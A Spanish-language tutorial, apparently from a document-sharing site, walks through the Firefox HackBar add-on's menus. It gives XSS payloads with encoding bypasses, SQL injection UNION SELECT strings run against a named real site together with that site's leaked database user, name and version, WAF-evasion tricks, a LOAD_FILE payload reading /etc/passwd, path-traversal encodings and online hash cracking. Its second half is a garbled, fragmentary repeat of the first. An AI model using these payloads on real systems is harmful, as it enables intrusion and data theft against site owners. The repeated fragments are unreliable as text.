Usando Hackbar

Usando la hackbar
Hackbar es un complemento de firefox que se usa para seguridad

web, es una herramienta muy util para diferentes tipos de ataques,
ademas de que te deja visualizar mejor que lo que estas escribiendo
en la url :)
Pueden descargar la hackbar desde:
Tamaño del recuadro de hackbar
Ahi miramos una imagen de la hackbar.... Veamos sus opciones :D
+ y – a la derecha hace que podamos ver mas o menos grande el

recuadro, ejemplo le pique muchas veces al + =O :
si le picaramos – entonces se haria mas chico ese recuadro xD!
Cargando url, cortando url y ejecutando

Load url= carga la url en la que estamos actualmente... ejemplo:
le di load url y me carga en la url que estoy actualmente
Split url= Corta en trozos la url... ejemplo:
tiene que ser una url que no sea amigable (con esto me refiero a que
no tenga como separadores / ) sino que tenga & o ?
Execute= lo que hace es ejecutar la url como esta en ese momento,

en caso de que la modifiquemos se enviara una url modificada :P, en
este ejemplo vamos a probar con un reto que posteo TioSam en
cl-security:
Al hacer login:
como vemos... tiene un error
esa url esta sin modificar, ahora si modificamos ese user does not
exist, por cualquier otra cosa es lo que nos saldra? Seep, Vamos a
darle Execute :D
Como pueden ver nos puede servir para realizar ataques xss :D
XSS
ya que estamos en ello xD! En la hackbar hay un partado que dice
XSS
Como vemos tiene String.fromCharCode(), HTML Characters,

alert(XSS) statement.
String.fromCharCode() = esta funcion lo que hace es convertir un
numero unicode a una letra entonces todo lo que este dentro de ()
sera en realidad numeros unicode. Esto nos serviria para bypassear
por ejemplo un xss donde no puedas usar las “” (comillas dobles) o ''
(comillas simples) o // (diagonales), entonces podriamos usar por
ejemplo:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
donde 88,83,83 seria XSS despues de haberlo desencriptado con la

misma funcion String.fromCharCode
HTML Characters = son caracteres html tambien nos sirve para

bypassear un xss, por ejemplo:
<IMG
SRC=javascrip
t:alert(
'XSS')>
lo que vendria siendo lo mismo que:
<IMG SRC=javascript:alert( 'XSS') >
solamente que encodeado en html characters :D
alert(XSS) statement = declaracion alert xss, lo

que hace es declararnos un alert junto con
string.fromcharcode, que vendria siendo:
alert(String.fromCharCode(88, 83, 83))
el string.fromcharcode por defecto le ponen XSS,

pero si tu quieres poner otro valor como tu nombre
pues solamente utilizas string.fromcharcode de la
hackbar he ingresas tu nombre, por ejemplo:
String.fromCharCode(97, 114, 116, 104, 117,
115, 117)
en este caso es mi nick arthusu :P
Encriptacion
Como podemos ver estas son encriptaciones solamente md5 menu,

sha-1 menu, sha-256, rot13
md5 menu= esta tiene unas subopciones...

*md5 hash= te genera un hash md5, ejemplo:
584e4d63468d4c1de871663ae62cc1e6
vendria siendo arthusu pero encriptado en md5, esto muchas veces
se da en los ingresos a las bases de datos por sql injection, pues
tambien trae otro submenu para desecriptar:
*md5 send to>md5.rednoize.com= lo que hace es enviar el md5 que
ingreses a la pagina md5.rednoize.com para ver si tiene el valor que
le enviastes en su base de datos, si es asi te envia el resultado sino
no tuvistes suerte xD
por ejemplo enviamos mi nick que es el de arriba:
No results :(
no obtuvimos resultados mala suerte :/ pero si enviaramos el
siguiente:
d947c85f4f06eb2942999f09396f31b9
nos devolveria:
zerocool
xD
bueno simplemente es lo mismo con los siguientes solo que con

diferente encriptacion :P
Sha-1 menu= encripta, desencripta sha-1 muy comunes en

inyecciones sql,
Nota interesante:
hay una herramienta creada por zioner de blackploit que se llama
hash identifier que lo que hace es identificar el tipo de hash muy util
en muchos casos :P
*sha-1 hash= genera un hash sha-1, ejemplo:
6f958d6ac077c3ec162cf88236573cd101a46a50
es mi nick arthusu xD
*sha1- send to>md5.rednoize.com= envia nuestra sha-1 a
md5.rednoize.com y si tenemos suerte encontramos la palabra
por ejemplo si enviamos:
d31c1e1969981c32ce7a941d0e1c0e1f1ac8de69
nos devolveria:
zerocool
sha-256= encripta a sha-256, ejemplo:

6b04fee9d0e9169f4640b04c43807baaf5db0aa82cda9cf4e8eaed3
2e6c9c15d que es mi nick xD
rot-13=encripta a rot-13, ejemplo:

neguhfh que es mi nick xD
Codificacion
Base64 Encode= codifica a base64 es muy utilizado en los retos que
ponen en las webs xD, ademas hay un xss donde puedes hacer por
URI encodeando base64, por ejemplo el que puso Dedalo en su web
http://www.xssvector.com
data:text/html;base64,Ij48c2NyaXB0PmFsZXJ0KDEzMzcpPC9zY3
JpcHQ+
donde data seria el tipo de dato que en este caso es text/html

base64 quiere decir que lo que sigue esta codificado en base64...
para decodificarlo podemos usar...
Base64 Decode= decodifica un base64, con esto decodificamos la

cadena anteior y nos daria: "><script>alert(1337)</script> un xss :P
URL encode= codifica una url a un formato hexadecimal separado

por % un ejemplo es un path transversal donde se podria codificar
la codificacion hexadecimal “../” que es igual a "%2E%2E%2f"
o una doble codificacion:
doble codificacion de “../” que es igual a "%252E%252E%252F"
Nota interesante:
igual tambien esto se puede aplicar en xss en las etiquetas “<” “>”,
una ves Dedalo me comento que en un formulario el navegador
codifica automaticamente lo que le enviamos entonces muchas
veces para que este ataque sea efectivo hacemos doble enconding
en hackbar, yo mire un video una ves donde decia que todos los
navegadores basados en netscape hacian esto de encoding pero que
internet explorer que no esta basado en netscape no hace lo mismo
XD.
URL decode= Decodifica una url, este seria un buen ejemplo para los
que envian csrf codificado puedes decodificarlo con esta tool,
muchas veces te envian tambien acortadores de url, esto se sale un
poco del tema pero ya hay paginas que te hacen el favor de revelarte
la url un ejemplo: http://longurl.org/
Hex encoding= codificacion en hexadecimal, tiene varias

subopciones...
puse mi nick arthusu en todas las opciones pero diferente orden:
*String to 00ff00ff = 61727468757375

*String to 00 ff 00 ff = 61 72 74 68 75 73 75
*String to 00:ff:00:ff = 61:72:74:68:75:73:75
Estas tres subopciones de arriba son casi iguales lo unico diferente

es el orden de separacion, ahora esto lo que hace es codificar una
cadena de caracteres a hexadecimal, ponemos por ejemplo,
SeguridadBlanca:
536567757269646164426c616e6361
este nos puede servir por ejemplo en una inyeccion sql

especificamos database=basededatos pero puede que nos
intervenga algun firewall por lo cual lo pasamos a hexadecimal, que
vendria siendo: database=0x6261736564656461746f73
a un hexadecimal siempre le agregamos 0x para saber que es
hexadecimal, esto se usa tambien en concat 0x3a donde 3a es el
valor hexadecimal de : XD
*INT to HEX= convierte un numero a hexadecimal, ejemplo del

numero 500 es igual a 1f4
Hex decoding= decodifica valores numericos y caracteres en hex,
tiene dos subopciones:
*HEX to INT = decodifica un valor hexadecimal codificado en
numero. Ejemplo:
1f4 es igual a 500
*HEX to characters = decodifica un valor hexadecimal codificado en
caracter. Ejemplo:
3a es igual a :
Otras
Como lo dice su nombre son otras opciones que pueden ser utiles
muchas veces.
Addslashes= lo que hace es agregarle diagonales a una cadena que

contenga ' (comillas simples) o “ (comillas dobles), por ejemplo:
"¿Hola como estas?'
te lo convertiria a:
\"¿Hola como estas?\'
Stripslashes= Es diferente a addslashes lo que hace es quitarle las

barras, por ejemplo:
\"¿Hola como estas?\'
te lo convertiria a:
"¿Hola como estas?'
Stripspaces= le quita los espacios a una cadena, por ejemplo:

¿Hola como estas?
Te lo convertiria a:
¿Holacomoestas?
Reverse= lo que hace es voltear el texto de manera inversa o

alreves, por ejemplo si tu pones:
¿Hola como estas?
Se convertiria a:
?satse omoc aloH¿
Usefull String= contiene opciones muy interesantes casi todo

relacionado con cadenas....
*PI= te da el valor de pi, pero no completo, ejemplo: 3,14159265
*Bigger PI= te da el valor de pi, completo, ejemplo:
3,14159265358979323846264338327950288419716939937510
*PHI= te da el valor de phi, ejemplo: 1.618033988749895
*Lorem Ipsum= este texto se usa mucho cuando estas creando una
pagina web, es un texto de prueba, asi no tendrias que escribir
cualquier cosa solo dale lorem ipsum XD, ejemplo:
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do
eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut
enim ad minim veniam, quis nostrud exercitation ullamco laboris
nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in
reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla
pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
culpa qui officia deserunt mollit anim id est laborum.
*Fibonacci= este es unwey que era matematico y que creo un
sistema de numeracion indo-arabigo que ahora vendria siendo como
el sistema decimal o base 10, ejemplo:
0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597,
2584, 4181, 6765, 10946, ...
*Buffer Overflow= desbordamiento de buffer, es un error de
software que se produce cuando un programa no controla
adecuadamente la cantidad de datos que se copian sobre un área de
memoria reservada a tal efecto (buffer), de forma que si dicha
cantidad es superior a la capacidad preasignada los bytes sobrantes
se almacenan en zonas de memoria adyacentes, sobrescribiendo su
contenido original. Esto constituye un fallo de programación.
Mas info...
http://es.wikipedia.org/wiki/Desbordamiento_de_b%C3%BAfer
Esta tiene varias opciones que son diferentes cantidades de datos

*128 =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
*512
=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA
*1024
*2048
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*custom = este es un valor personalizado de datos por ejemplo si
pongo 5, me dara:
AAAAA
la cantidad que le pedi :)
SQL
SQL (lenguaje estructurado de consulta) lo que hace es pedir
informacion a una base de datos.
MySQL = es la base de datos mysql, tiene varias subopciones.
*Basic info column= informacion basica de una columna, un ejemplo

seria la pagina que mostro caleb_bucker en su tutorial de sql
inyeccion:
http://refrisistemas.com/noticias.php?ID=4 UNION SELECT
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,
6,7,8--
donde concatenamos todos los datos con concat_ws...
con char se convierte un numero decimal a caracter en el ejemplo
esta: 32,58,32 que vendria siendo espacio : espacio y asi nos dividiria
los datos que siguen, user(), database(), version() que nos dan
informacion del usuario, de la base de datos, y la version de la base
de datos, con esto nos devolveria:
refricom_web@localhost : refricom_bd : 5.0.95-community
donde si te fijas bien se aplican todo los parametros anteriores :)
*convert using utf-8= convierte una cadena o numero a utf8,

ejemplo:

CONVERT(1 USING
utf8),CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,
4,5,6,7,8--
convierte 1 a utf8 y el servidor lo interpreta :) no se alo mejor puede
ser una forma de bypass WAF XD
Nota interesante:
Para profundizar en el tema pueden leer el articulo pwned waf que
publico q3rv0 en su web underterminal
*convert using latin1= esto lo que hace es convertir una cadena o

numero a latin1 pero la base de datos lo interpreta, por ejemplo:

CONVERT(1 USING
latin1),CONCAT_WS(CHAR(32,58,32),user(),database(),version()),
3,4,5,6,7,8--
como puedes ver me convierte el numero 1 a latin1 y la base de

datos lo interpreta :D
*mysql char() = como se ve en el principio de unos de los botones de

hackbar (en el de basic info column para ser precisos xD), lo que hace
es: char se convierte un numero decimal a caracter , ahi arriba
podemos apreciar la tabla :D
ejemplo:

CONVERT(1 USING
3,4,5,6,7,8--
donde char(32,58,32) seria espacio dos puntos espacio asi es como

nos dividiria esa informacion, q3rv0 mostro en su tutorial que se
puede bypassear con char de la siguiente manera:
http://somepage/intranet.php?id=9999+CHAR(117, 110, 105, 111,

110)+CHAR(115, 101, 108, 101, 99, 116)+1,2,3,4+AND+1=1
tambien en hackipedia se muestra un ejemplo:
NULL UNION ALL SELECT

LOAD_FILE(CHAR(34,47,101,116,99,47,112,97,115
,115,119,100,34))/*
donde se lee el archivo /etc/passwd se puede hacer lo mismo

convirtiendolo en hexadecimal con la herramienta enconding>hex
encoding que vimos anteriormente solo que agregandole 0x al
principio para que sepa que es un valor hexadecimal :D
MSSQL= microsoft sql, tiene una subopcion:

*Mssql char()= si en algun caso la base de datos fuera mssql
entonces podriamos aplicar los ejemplos de arriba solo que el char
se declara de diferente manera que en mysql, ejemplo:
CHAR(97) + CHAR(114) + CHAR(116) + CHAR(104) + CHAR(117) +
CHAR(115) + CHAR(117)
quer vendria siendo arthusu
*Oracle= base de datos de oracle, tiene una subopcion.

Oracle chr()=hace lo mismo que las otras dos funcioner char() de
arriba solo que en su sintaxis :P, ejemplo:
CHR(97) || CHR(114) || CHR(116) || CHR(104) || CHR(117) ||

CHR(115) || CHR(117)
que vendria siendo arthusu
Union Select Statement = declaracion union select, este botonsito

es muy util cuando no quieres escribir toda la declaracion por
ejemplo:

1,2,3,4,5,6,7,8--
entonces solamente clickamos ese botonsito y le ponemos 8 y nos da
la declaracion de arriba mostrada en color rosa xD! XD
Spaces to inline comments= agregar comentarios en los espacios

que hay entre las lineas de declaraciones, esta seria una forma de
bypass al waf me ha funcionado varias veces, ademas qu3rv0 lo
menciona es su articulo, un ejemplo:
http://refrisistemas.com/noticias.php?
ID=4/**/UNION/**/SELECT/**/CONVERT(1 USING
3,4,5,6,7,8--
Viendo las cabeceras datos con el metodo post

y referrer
Enable Referrer= nos deja ver la cabecera referrer, un ejemplo:
como puedes ver el referrer se muestra en el cuerpo de la web,
entonces podemos poner lo que queramos xD, ejemplo:
leemos url, habilitamos referrer lo cambiamos y execute :D
Enable post data= podemos ver los campos post, un ejemplo:

En un reto que hice en underc0de donde no dejaba ingresar mas que
5 caracteres :
entonces enviamos cualquier cosa y habilitamos post data e
ingresamos lo que queramos :D
1 mas 1 menos :)
esta es la ultima parte del tutorial vamos a ver como podemos dar 1
mas 1 menos en diferentes tipos de datos:
*INT =entero
*HEX= hexadecimal
*OCT= octal
*Alphabet= alfabeto
*AlNum= numeros
bueno podemos cambiar entre las opciones y poner un valor en el
campo de ingresar texto del hackbar, si por ejemplo tuviesemos una
blind sql y estuvieramos checando las letras podriamos usar
alphabet para ir probando :D (aunque no es todos los casos ya que
en unos usamos char() )
ejemplo:
tenemos el apartado en HEX (hexadecimal) en el campo de ingreso

de texto del hackbar tenemos 61 = a en hex, entonces si le damos al
boton + que es verde se hace 62 y si le damos – se vuelve a 61, como
dije anteriormente depende de nuestra imaginacion para darle
utilidad :D
GR33TZ:
dedalo,q3rv0, caleb_bucker que me fueron de ayuda para este
tutorial xD :B
y saludos a todos los que ya me conocen xD

Usando Hackbar

Cargado por

Copyright:

Formatos disponibles

Usando Hackbar

Cargado por

Información del documento

Descripción original:

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Usando Hackbar

Cargado por

Copyright:

Formatos disponibles

Usando la hackbar

Hackbar es un complemento de firefox que se usa para seguridad

Pueden descargar la hackbar desde:

Tamaño del recuadro de hackbar

Ahi miramos una imagen de la hackbar.... Veamos sus opciones :D

+ y – a la derecha hace que podamos ver mas o menos grande el

si le picaramos – entonces se haria mas chico ese recuadro xD!

Cargando url, cortando url y ejecutando

le di load url y me carga en la url que estoy actualmente

Split url= Corta en trozos la url... ejemplo:

Execute= lo que hace es ejecutar la url como esta en ese momento,

Como vemos tiene String.fromCharCode(), HTML Characters,

donde 88,83,83 seria XSS despues de haberlo desencriptado con la

HTML Characters = son caracteres html tambien nos sirve para

lo que vendria siendo lo mismo que:

<IMG SRC=javascript:alert( 'XSS') >

solamente que encodeado en html characters :D

alert(XSS) statement = declaracion alert xss, lo

alert(String.fromCharCode(88, 83, 83))

el string.fromcharcode por defecto le ponen XSS,

en este caso es mi nick arthusu :P

Como podemos ver estas son encriptaciones solamente md5 menu,

md5 menu= esta tiene unas subopciones...

bueno simplemente es lo mismo con los siguientes solo que con

Sha-1 menu= encripta, desencripta sha-1 muy comunes en

sha-256= encripta a sha-256, ejemplo:

rot-13=encripta a rot-13, ejemplo:

donde data seria el tipo de dato que en este caso es text/html

Base64 Decode= decodifica un base64, con esto decodificamos la

URL encode= codifica una url a un formato hexadecimal separado

Hex encoding= codificacion en hexadecimal, tiene varias

puse mi nick arthusu en todas las opciones pero diferente orden:

*String to 00ff00ff = 61727468757375

Estas tres subopciones de arriba son casi iguales lo unico diferente

este nos puede servir por ejemplo en una inyeccion sql

*INT to HEX= convierte un numero a hexadecimal, ejemplo del

Addslashes= lo que hace es agregarle diagonales a una cadena que

Stripslashes= Es diferente a addslashes lo que hace es quitarle las

Stripspaces= le quita los espacios a una cadena, por ejemplo:

Reverse= lo que hace es voltear el texto de manera inversa o

Usefull String= contiene opciones muy interesantes casi todo

Esta tiene varias opciones que son diferentes cantidades de datos

MySQL = es la base de datos mysql, tiene varias subopciones.

*Basic info column= informacion basica de una columna, un ejemplo

refricom_web@localhost : refricom_bd : 5.0.95-community

donde si te fijas bien se aplican todo los parametros anteriores :)

*convert using utf-8= convierte una cadena o numero a utf8,

http://refrisistemas.com/noticias.php?ID=4 UNION SELECT

*convert using latin1= esto lo que hace es convertir una cadena o

http://refrisistemas.com/noticias.php?ID=4 UNION SELECT

como puedes ver me convierte el numero 1 a latin1 y la base de

*mysql char() = como se ve en el principio de unos de los botones de

http://refrisistemas.com/noticias.php?ID=4 UNION SELECT

donde char(32,58,32) seria espacio dos puntos espacio asi es como

http://somepage/intranet.php?id=9999+CHAR(117, 110, 105, 111,

NULL UNION ALL SELECT

donde se lee el archivo /etc/passwd se puede hacer lo mismo

MSSQL= microsoft sql, tiene una subopcion:

quer vendria siendo arthusu